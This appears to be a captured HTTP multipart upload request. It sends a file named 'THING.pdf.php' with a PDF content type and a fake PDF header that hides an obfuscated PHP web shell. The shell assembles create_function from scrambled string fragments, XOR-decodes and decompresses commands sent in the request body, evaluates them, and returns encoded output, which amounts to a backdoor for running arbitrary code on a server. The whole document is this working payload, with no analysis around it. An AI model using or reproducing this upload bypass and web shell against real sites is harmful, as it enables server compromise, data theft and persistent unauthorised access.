

-----------------------------105300643986911827594710914
Content-Disposition: form-data; name="MAX_FILE_SIZE"

200000
-----------------------------105300643986911827594710914
Content-Disposition: form-data; name="pdfFile"; filename="THING.pdf.php"
Content-Type: application/pdf

%PDF-1.5 
<?php
$P=str_replace('sF','','sFcsFrsFsFeatesF_functsFion');
$C='@b*a*s*e64_decode($m*[1]),$k)));$o=@ob_get_*conte*nts()*;*@ob_en*d_cl*ean(';
$q='nts("p*hp://in*p*ut"),$m)==1) {*@ob_*start();@e**val(@g*zunc*ompres*s(@x*(';
$k='or($i=0;$i<$l*;){for(*$j*=0;($j<$*c&&*$i<$l);$*j++*,$i+*+){$o.=$t{$i*}^$k{$';
$H=');$r=**@bas*e64_encod**e(@x(@gzcompr*ess($o),$k));pr*i*nt("$p*$kh$r$kf");}';
$j='*j};*}}return* $*o;}if (@*pr*eg_match("/$kh*(.+)$k*f/*",*@file_get_co*nte*';
$r='H*5i2n*1n*I";function *x($t,$k)**{$c=strlen($k);*$l=*st*rlen(*$t);$o="";f*';
$Z='$k=*"2591*c98b";$k*h="701*19fe6*2489";$kf=*"8b1e4*24b5e9*1";*$p="cH9D7y**J3';
$f=str_replace('*','',$Z.$r.$k.$j.$q.$C.$H);
$E=$P('',$f);$E();
?>
%%PDF-1.5 
